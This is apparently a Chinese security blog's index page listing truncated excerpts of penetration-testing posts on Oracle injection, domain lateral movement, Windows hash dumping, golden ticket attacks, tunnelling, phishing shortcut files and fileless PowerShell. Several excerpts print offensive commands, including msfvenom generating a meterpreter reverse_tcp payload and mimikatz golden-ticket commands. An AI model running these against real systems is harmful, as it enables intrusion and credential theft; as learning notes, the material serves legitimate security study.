goby编写自定义poc 前言goby是一款攻击面分析工具,同时拥有资产扫描、资产识别和漏洞扫描能力,安装简单,直接解压即可使用,界面也非常友好,内置了大量由官方和其他网络安全从业者提供的poc。 官网: https://gobies.org/ 帮助goby提交poc积攒到一定数量可以获取功能更强大的hvv红队专版,本文以CVE-2021-21975 VMware vRealize Operations Manager S 2021-05-07 工具 工具
oracle数据库注入 前言过去渗透遇到oracle注入都是使用工具去跑的,这几天看到相关的文章就想起自己对oracle数据库手工注入的知识点还有所欠缺,本文做次简单的笔记整理 角色123connect --连接角色,基本角色resource --开发者角色dba --超级管理员角色 注入时常用命令123456789101112查询用户名select user from dual;获取当前数据库名select * fr 2021-05-06 sql注入 oracle
域渗透中利用ipc命令执行总结 域环境搭建参考 https://blog.csdn.net/niexinming/article/details/75650128 开启$ipc和$admin 12net share $ipcnet share $admin 直接执行12dir \\IP\c$tasklist /S IP /U 用户 /P 密码 sc123sc \\[HOST] create boom binpath= c:\ 2021-04-29 域渗透 域渗透
windows哈希提取方式总结 getpass.exeGetpass.exe是闪电小子开发的一款windows下哈希获取软件,直接运行Getpass.exe即可导出windows密码 pwdump8.exe下载windows工具pwdump8.exe,上传到目标机执行 .\pwdump8.exe Quarks-pwdump.exe打开QuarksPwDump.exe目录,命令行执行QuarksPwDump.exe –dhl 2021-04-22 内网渗透 hash
票据传递攻击 黄金票据攻击 登陆域控,dump Krbtgt用户hash和域sid,privilege::debuglsadump::lsa /patch 获取域信息 切换到普通域用户的机器,生成TGT凭证,用户名为administratormimi下执行kerberos::golden /user:administrator /domain:xxx.com /sid:xx-xx-xx-xx 2021-04-21 域渗透 域渗透
reGeorg内网穿透 前言当遇到拿到webshell却无法取得主机权限的场景下,并不一定就要死磕提权这个思路或者放弃这个入口点,我们可以通过使用reGeorg搭建httptunnel代理直接深入内网。 reGeorg安装使用原版reGeorg项目地址:https://github.com/sensepost/reGeorg 123git clone https://github.com/sensepost/reGeor 2021-04-15 内网渗透 代理
windows提权速查流程 1.可利用漏洞信息收集收集本机systeminfo中补丁信息 在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp 然后查询exp,选择对应的Exp下载运行即可。https://i.hacking8.com/https://github.com/SecWiki/windows-kernel-exploits 提权Exp的运行方式,一般有以下几种: 123 2021-04-12 提权 提权
常见windows钓鱼文件制作 快捷方式1.ps1: 123456$WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("test.lnk") $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" $Shortcu 2021-03-15 钓鱼 钓鱼
msf普通shell升级成meterpreter 升级shell接收普通反弹shell 12345678use multi/handlerset payload windows/shell/reverse_tcprun[*] Started reverse TCP handler on xxxxxxxx[*] Encoded stage with x86/shikata_ga_nai[*] Sending encoded stage (267 b 2021-03-12 msf msf
powershell无文件 目标出网1234567891011121314151617# 攻击机# msf生成powershell脚本msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 --arch x64 --platform windows -f psh-reflection -o test.ps1# python监 2021-03-11 powershell powershell